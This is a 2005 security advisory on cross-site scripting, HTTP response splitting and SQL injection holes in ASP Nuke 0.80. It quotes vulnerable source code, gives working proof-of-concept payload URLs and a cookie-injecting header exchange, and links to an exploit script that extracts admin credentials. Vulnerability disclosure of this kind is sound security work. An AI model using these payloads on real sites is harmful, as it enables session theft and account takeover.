SecurityTracker: ASP Nuke Input Validation Holes Permit SQL Injection, HTTP Response Splitting, and Cross-Site Scripting Attacks


M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80

Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/



Software Description

***********


"ASP Nuke is an open-source software application for running a
community-based web site on a web server. By open-source, we mean the code
is freely available for others to read, modify and use in accordance with
the software license. ASP Nuke is an extensible framework that allows you to
upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site
operators to re-organize the layout and navigation for their site."



Cross-Site Scripting (XSS)

***********


Let's look at code from /module/account/register/forgot_password.asp at line
33 and 103:

    <?
    ...
    sEmail = steForm("Email")
    ...
    <TR>
 <TD class="forml">
 <% steTxt "E-Mail" %> (req)<BR>
 <INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22"
MAXLENGTH="80" class="form">
 </TD>
    </TR>
    <TR>
    ...
    ?>

As we can see there isn't any control on the 'email' parameter when the
board get it's value.
Since the value of the parameter is put in the HTML page as is, an attacker
can do an XSS attack with an URL like this:


http://www.example.com/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

On the same line there are others parameters that aren't properly sanitised.
These are some PoC URLs:


http://www.example.com/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Password=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address1=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address2=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?City=%22%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cs
cript%3Ealert(document.cookie)%3C/script%3E



HTTP Response Splitting

***********


Let's look at code from /module/support/language/language_select.asp at line
31:

    <?
    ...
    If steForm("action") = "go" Then
        ' make sure the required fields are present
        If Trim(steForm("LangCode")) = "" Then
            sErrorMsg = steGetText("Please select a language from the list
below")
        Else
            ' redirect to the language administration
            Response.Redirect "tran_list.asp?langcode=" &
steEncForm("LangCode")
        End If
    End If
    ...
    ?>

When the redirect, that this piece of code do, happend, it's possibile to do
a CRLF injection attack thanks to an unexisting sanitisation. This is a Poc
URL:


http://www.example.com/module/support/language/language_select.asp?action=go
&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

These are examples of HTTP headers:

    Request:
        POST
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0
aSet-Cookie%3Asome%3Dvalue HTTP/1.0
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
        Host: www.aspnuke.com
        Content-Length: 90
        Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
        Connection: Close

    Response:
        HTTP/1.1 302 Object moved
        Server: Microsoft-IIS/5.0
        Date: Sun, 15 May 2005 11:31:37 GMT
        Pragma: no-cache
        Location: tran_list.asp?langcode=trivero
        Set-Cookie: some=value
        Connection: Keep-Alive
        Content-Length: 121
        Content-Type: text/html
        Expires: Sun, 15 May 2005 11:30:38 GMT
        Cache-control: no-cache



SQL Injection

***********


Let's look at code from /module/support/task/comment_post.asp at line 36 and
75:

    <?
    ...
    nTaskID = steNForm("TaskID")
    ...
    If sErrorMsg = "" Then
        ' prevent dup posting here
        sStat = "SELECT TaskID " &_
            "FROM tblTaskComment " &_
            "WHERE TaskID = " & nTaskID & " " &_
            "AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
            "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
    ...
    ?>

As we can see there isn't any control on the 'TaskID' parameter when the
board get it's value. Since the value of the parameter is put in the SQL
query without sanitisation, an attacker can do an SQL injection attack. I've
made an exploit for this vulnerability that it's able to recover the admin's
username and the SHA256 hash of his password available at this address:
http://albythebest.altervista.org/aspnuke.pl



Solution

***********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@jumpy.it
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group

Go to the Top of This SecurityTracker Archive Page